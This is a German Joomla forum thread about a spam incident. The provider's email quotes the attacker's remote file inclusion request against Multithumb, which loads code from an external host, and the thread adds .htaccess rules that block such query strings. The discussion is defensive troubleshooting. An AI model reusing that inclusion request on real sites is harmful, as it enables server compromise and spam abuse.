+ Antworten
Ergebnis 1 bis 6 von 6

Thema: Sicherheitslücke in Multithumb ?!?

  1. #1
    Neu an Board Avatar von Airhead
    Registriert seit
    23.10.2007
    Ort
    bei Osnabrück
    Beiträge
    43
    Bedankte sich
    2
    Erhielt 5 Danksagungen
    in 5 Beiträgen

    Frage Sicherheitslücke in Multithumb ?!?

    Hallo,
    ich habe heute morgen folgende Mail von meinem Provider bekommen:
    Code:
    Hallo,
    leider muss ich Sie wegen eines Spamvorfalls über Ihre Domain kontaktieren. 
    Dabei nutzte ein Angreifer eine Sicherheitslücke in ihrem PHP-Script, um Spam 
    über Ihre Domain zu verbreiten.
    
    Aufruf über Browser des Angreifers:
    powerboxer.de/mambots/content/multithumb.php?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt??
    
    Wir haben die Sicherheitslücke vorerst mittels einer .htaccess-Datei geschlossen. 
    Desweiteren haben wir die IP des Angreifers gesperrt. Bitte prüfen Sie die 
    Version Ihres Scriptes auf Aktualität! Sollte dies bereits die neueste Version 
    sein, informieren Sie bitte den Entwickler über die Sicherheitslücke.
    
    Inhalt der .htaccess-Datei:
    
    RewriteEngine On
    RewriteCond %{QUERY_STRING}   (.*)=http(.*)   [NC,OR]
    RewriteCond %{QUERY_STRING}   (.*)urlx=(.*)   [NC]
    RewriteRule ^(.*)  - [F]
    
    
    Beschreibung:
    RewriteCond %{QUERY_STRING}   (.*)=http(.*)/(.*)urlx=(.*) = kontrolliert den Inhalt nach index.php?XXXX darauf, ob eventuell eine externe Datei eingebunden wird mit index.php/site=http://xxxx.com/yyyy.php
    [NC]= ignorieren der Groß und Kleinschreibung
    RewriteRule ^(.*) - [F] = verbietet den Zugriff auf die Seite, wenn oben genannte RewriteCond zutrifft
    (Ich hab den htaccess-code mit angegeben, vielleicht interessiert es ja jemanden)

    Ist jemandem eine Sicherheitslücke bei Multithumb bekannt?
    Die Datei wurde jedenfalls auf dem Server nicht angerührt und funktioniert auch.

    Weitere Infos zur Seite:
    Joomla!1.0.13
    sef404
    joomap
    multithumb

    Grüße,
    Airhead

  2. #2
    Modeberater Avatar von Zorro
    Registriert seit
    30.10.2003
    Ort
    Hessen
    Beiträge
    2.995
    Bedankte sich
    50
    Erhielt 409 Danksagungen
    in 325 Beiträgen

    Standard

    Zitat Zitat von Airhead Beitrag anzeigen
    Ist jemandem eine Sicherheitslücke bei Multithumb bekannt?
    Ja, siehe hier: http://www.joomlaportal.de/sicherhei...ultithumb.html

    Prüf mal Deine Version von Multithumb und upgrade, falls nötig.

    Viele Grüße,
    Zorro

  3. #3
    Neu an Board Avatar von Airhead
    Registriert seit
    23.10.2007
    Ort
    bei Osnabrück
    Beiträge
    43
    Bedankte sich
    2
    Erhielt 5 Danksagungen
    in 5 Beiträgen

    Standard

    Zitat Zitat von Zorro Beitrag anzeigen
    Prüf mal Deine Version von Multithumb und upgrade, falls nötig.
    Danke für die Antwort und den Link.
    Ich habe die aktuelle Version 2.0

    Grüße,
    Airhead

  4. #4
    Gute Seele des Boards Avatar von keraM
    Registriert seit
    12.03.2006
    Ort
    Dresden
    Beiträge
    10.592
    Bedankte sich
    152
    Erhielt 2.558 Danksagungen
    in 2.360 Beiträgen

    Standard

    Eventuell Joomla auf .15 aktualisieren?
    Gruß keraM
    Joomla-FAQ: --> Klick!
    Support per PN: --> Klick!

  5. #5
    JoomGallery Avatar von Claudia E.
    Registriert seit
    12.04.2007
    Ort
    nahe Berlin
    Beiträge
    6.825
    Bedankte sich
    135
    Erhielt 1.768 Danksagungen
    in 1.678 Beiträgen

    Standard

    Nutzt du wirklich SEF404? Das steht in der Liste der unsicheren Erweiterungen...
    Bitte wechseln auf sh404Sef.
    Freundliche Grüße von Claudia

    Forum, Doku, FAQ, Demo der JoomGallery

  6. #6
    Neu an Board Avatar von Airhead
    Registriert seit
    23.10.2007
    Ort
    bei Osnabrück
    Beiträge
    43
    Bedankte sich
    2
    Erhielt 5 Danksagungen
    in 5 Beiträgen

    Idee

    Zitat Zitat von Claudia E. Beitrag anzeigen
    Nutzt du wirklich SEF404?Bitte wechseln auf sh404Sef.
    Hallo Claudia,
    ich nutze natürlich sh404Sef, ...war ein Schreibfehler


    Ok, ich habe mich nun ausführlicher mit dem Thema befasst.
    Ich habe mir phpsecinfo auf meinen Webspace installiert um zu erfahren, welche Sicherheitslücken mein Provider offen hat.

    Ergebnis: alles soweit ok bis auf 'allow_url_fopen'.
    (Hier ist beschrieben, was allow_url_open on für Risiken birgt.)

    Da ich keinen eigenen Server betreibe habe ich keinen Zugriff auf die php.ini.
    Mit der .htaccess konnte ich das Loch auch nicht stopfen,
    (php_flag allow_url_fopen off)
    sodass ich meinen Provider allinkl anschrieb.
    Sie können/wollen das nicht ändern, aber nachfolgender Eintrag in der .htaccess soll das Problem beheben:
    Code:
    RewriteEngine On
    RewriteCond %{QUERY_STRING}   (.*)=http(.*)   [NC,OR]
    RewriteCond %{QUERY_STRING}   (.*)urlx=(.*)   [NC]
    RewriteRule ^(.*)  - [F]
    Ich hoffe das hilf jemanden, der gleichartige Probleme hat

    Gruß, Airhead

+ Antworten

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein